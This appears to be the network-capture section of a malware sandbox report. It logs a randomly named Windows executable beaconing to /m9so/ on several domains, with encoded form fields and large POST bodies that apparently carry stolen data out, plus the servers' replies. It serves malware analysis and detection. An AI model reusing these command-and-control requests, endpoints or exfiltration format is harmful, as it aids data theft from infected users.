                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    7 | 192.168.11.20 | 49789 | 46.30.215.63 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 14:49:07.208565950 CET | 1286 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:49:07.797123909 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 13:59:07 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:49:07 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:49:07 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 56020435387
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49790 | 46.30.215.63 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:49:09.906007051 CET | 532 | OUT | GET /m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP+bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k+cOpuPGr7qZ2xBz7I=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.manupaint.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:49:10.084331036 CET | 1147 | IN | HTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 774
                                                                                    Expires: Mon, 18 Mar 2024 13:59:09 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:49:09 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:49:09 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 55968141025
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Accept-Ranges: bytes
                                                                                    Connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP&#43;bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k&#43;cOpuPGr7qZ2xBz7I=&amp;OBLTJ=U4yhXH6x-jhX"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP&#43;bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k&#43;cOpuPGr7qZ2xBz7I=&amp;OBLTJ=U4yhXH6x-jhX">the page that was supposed to be here</a></p></iframe></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49791 | 91.195.240.19 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:49:16.488398075 CET | 829 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.plainpathproductions.com
                                                                                    Origin: http://www.plainpathproductions.com
                                                                                    Referer: http://www.plainpathproductions.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Ascii: LFPxWlV=R11vVwh4Zuo/AWbtZ3nrJ9NffBo3lpay4OC0OBAkmByFo+8VFMV4hnNUeG8OTc6DUvN8EoS6Ue9bdMI5d/+hT9aNrh8eTQ61YKhiqJtXymsT3yTc1lhwDbJ5Pw2Ko/2WUBZSHWWhYPJmYqERCKfiXqmwpftXACXpXi8hPgAnNHq1UczZIo7/Q/qEjbKLMQgljQ==
Mar 18, 2024 14:49:16.670959949 CET | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 13:49:16 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49792 | 91.195.240.19 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:49:19.191752911 CET | 1169 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.plainpathproductions.com
                                                                                    Origin: http://www.plainpathproductions.com
                                                                                    Referer: http://www.plainpathproductions.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:49:19.375544071 CET | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 13:49:19 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49793 | 91.195.240.19 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:49:21.894691944 CET | 2572 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.plainpathproductions.com
                                                                                    Origin: http://www.plainpathproductions.com
                                                                                    Referer: http://www.plainpathproductions.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:49:22.077569962 CET | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 18 Mar 2024 13:49:21 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 154
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49795 | 91.195.240.19 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:49:24.598413944 CET | 543 | OUT | GET /m9so/?LFPxWlV=c3dPWH5xU9RuE2iPYX/YJd5aP2cwjKm8nfGtIgIly07Hn5MDdL5huHRSG1wDYayNCeUJMK+qa7csQOwAA/itbsq5+k4WWz6YXZNbnqhrlmQsoR/1yVl4O5E=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.plainpathproductions.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:49:24.811172009 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                    date: Mon, 18 Mar 2024 13:49:24 GMT
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    transfer-encoding: chunked
                                                                                    vary: Accept-Encoding
                                                                                    x-powered-by: PHP/8.1.17
                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    pragma: no-cache
                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_wBmBcKxKkmM19sIF6F01XRHLuogtHhb3xRL9OvNQnEdRvsKIkUDGrDKdk5aqeW9/HcaA75aUZL0ftsqIncLaJQ==
                                                                                    last-modified: Mon, 18 Mar 2024 13:49:24 GMT
                                                                                    x-cache-miss-from: parking-5747c769c4-km6mz
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_wBmBcKxKkmM19sIF6F01XRHLuogtHhb3xRL9OvNQnEdRvsKIkUDGrDKdk5aqeW9/HcaA75aUZL0ftsqIncLaJQ==><head><meta charset="utf-8"><title>plainpathproductions.com&nbsp;-&nbsp;plainpathproductions Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="plainpathproductions.com is your first and best source for all of the information


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49796 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:49:46.684406996 CET | 823 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Referer: http://www.teenpattimasterapp.org/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Ascii: LFPxWlV=EyWkeLlcDyed1ddkoY0fJX8kJikE6HeuwaI42Axq+MubVVFJK0i3ID1LBRH6ggU3yn7c3UiwOo4C4c1Hyu9lahwogMG7Tdkbt9LP1zrEaOvclXIRE89OKBo3NPQi2FdjD6s8Lz/6ueYc3iMkYxH8HL5VeZimu6ljD1d8ioavop80fsHm4ZOqWfDBkqiP2aYWTg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49797 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:49:49.359643936 CET | 1163 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Referer: http://www.teenpattimasterapp.org/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49798 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:49:52.032747030 CET | 2572 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Referer: http://www.teenpattimasterapp.org/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49799 | 84.32.84.32 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:49:54.719266891 CET | 541 | OUT | GET /m9so/?LFPxWlV=Jw+Ed+ZUGSr/+oJmj9kqbUJ4ViEG6A6UoqQX6gR3ieyHczkITEu4GAJNfTznjio58VSbv2GXL5IQ0LBvochodTMqi4TIQu8e5uWV6iD6Y5Xd5nwlY+1LHT8=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:49:54.874099970 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                    Server: hcdn
                                                                                    Date: Mon, 18 Mar 2024 13:49:54 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 10066
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    x-hcdn-request-id: 8a77be83ddb8cea5afab55ea81d2f021-phx-edge1
                                                                                    Expires: Mon, 18 Mar 2024 13:49:53 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 49804 | 172.67.130.3 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:51:36.209099054 CET | 790 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Origin: http://www.wbyzm5.buzz
                                                                                    Referer: http://www.wbyzm5.buzz/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:51:36.317581892 CET | 667 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 13:51:36 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 18 Mar 2024 14:51:36 GMT
                                                                                    Location: https://www.wbyzm5.buzz/m9so/
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q9xJVC0%2Fx7m2dHvrJ0f1l5oDT%2Fpts9CUhETxfKeAvlFPKb%2BsmLbLzEVz9QM5h%2F%2B555U6QXn8MnZlCS2RgKxjNBw9j5je72w56fQ3b%2FNFWderwDA0I48ZDia59SUpPED2sW0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665b2cb9dcd42ac-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.20 | 49805 | 172.67.130.3 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:51:38.822796106 CET | 1130 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Origin: http://www.wbyzm5.buzz
                                                                                    Referer: http://www.wbyzm5.buzz/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Mar 18, 2024 14:51:38.928982019 CET | 665 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 13:51:38 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 18 Mar 2024 14:51:38 GMT
                                                                                    Location: https://www.wbyzm5.buzz/m9so/
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yEW%2BPI93Hgk9vUF7n%2BHXCFaite2qiVAiGtlkaNbsjMzCmSAQ58mrvWqsJohYsfHKpXTITf%2FIm87S6bPHVw8N%2BMsz8divC4YhmtwZGj9c8KxyA%2FqQngOluE9wBAlxIHemlRk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665b2dbfa18c3ee-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.11.20 | 49806 | 172.67.130.3 | 80 | 7756 | C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
Timestamp | Bytes transferred | Direction | Data
Mar 18, 2024 14:51:41.448381901 CET | 9002 | OUT | POST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Origin: http://www.wbyzm5.buzz
                                                                                    Referer: http://www.wbyzm5.buzz/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
8amhCaI36IqE0QhCdh61t630H9jcXqdGXCFGgv/6sF1WzeZ6JL2NcQu0ii4Iz+pz+CRFRyeYvJj0F6IqHyiAkm4xeRPnJoqnn0hNv+PdDiAZZyrM9HYDj6ieoaDOJkF9ffZjK72W2bI4yUf1Mu/BeElkccnR11awCVyS+Oa14z7sUKTiFg99+A
                                                                                    Mar 18, 2024 14:51:41.448472023 CET3858OUTData Raw: 52 6d 66 76 54 74 48 50 4b 6f 32 65 49 46 4e 51 47 53 75 34 72 30 78 68 33 6c 34 70 41 50 62 5a 4a 42 4a 52 52 69 78 58 39 77 66 68 6e 46 70 75 63 62 6b 71 6b 55 61 36 44 4e 43 53 33 66 43 33 56 55 6f 2b 79 74 50 47 55 73 4c 4c 6b 71 45 70 75 76
                                                                                    Data Ascii: RmfvTtHPKo2eIFNQGSu4r0xh3l4pAPbZJBJRRixX9wfhnFpucbkqkUa6DNCS3fC3VUo+ytPGUsLLkqEpuvyxGlHA/sQXewJN9cADHRIf7q7RLEw9MlDHyQbIBHezSBYFwjrzeEH0Fo7zh7Qu1T8csHVgyLs10Xe8SWihJRzqVWNsj8hGyXYJGrJXhgD8Opz00CY8XELnhL8/xwBDQEU7ZMwM86L8vfcSBIYCjqg3zns0g7MSRA7
                                                                                    Mar 18, 2024 14:51:41.543211937 CET3858OUTData Raw: 74 78 49 32 45 65 6f 6b 44 6d 2f 70 33 42 6b 79 2f 75 36 50 66 58 34 51 39 48 76 46 6e 70 57 4e 6e 5a 53 6c 41 7a 44 35 38 76 6e 37 58 70 49 6d 35 78 30 53 33 35 49 32 52 37 30 35 33 75 32 4e 36 64 63 78 79 6b 57 76 58 6b 63 4b 6e 53 48 2b 52 70
                                                                                    Data Ascii: txI2EeokDm/p3Bky/u6PfX4Q9HvFnpWNnZSlAzD58vn7XpIm5x0S35I2R7053u2N6dcxykWvXkcKnSH+Rp9vuzyaP1vA+0h1+Nrrll7/NGt0xF1TgWJ2YsVWkqyqZbkjZlUdqVAWd/tFOh+aknAMEWm4D1afIH5cKRQ65ex3D7h+yUCszl3mhDFL9I5D6N+r/fU5aYbWKPAPa5vh11oD3kgInWto5nHwG6FaDKO/u4wbPctzZ4X
                                                                                    Mar 18, 2024 14:51:41.543296099 CET2572OUTData Raw: 74 38 68 54 34 62 57 76 66 31 78 48 56 52 33 52 7a 42 34 6e 33 51 44 6a 70 68 4c 65 58 36 33 31 2b 72 67 49 37 55 6c 2f 78 44 44 53 4d 64 57 66 50 79 52 67 49 36 73 72 67 49 68 77 38 65 30 54 50 43 42 31 6e 37 45 79 66 67 59 6d 44 42 4d 77 6b 6c
                                                                                    Data Ascii: t8hT4bWvf1xHVR3RzB4n3QDjphLeX631+rgI7Ul/xDDSMdWfPyRgI6srgIhw8e0TPCB1n7EyfgYmDBMwklkph7mM3uyjXhx7uqJ9HXEldbvb2rjm4qQI/2p6WXp1jnbRAPVhWFPgHRc6LH4jQnfbbraBoOwXvQF2IXEZnC/0RpR5LwR3A0I3NK7G2ZrjHdo8PoGwsI1GzqQQXHGlnUHtWVgEM5inHcPLn/I7RhYPB6glEq/abml
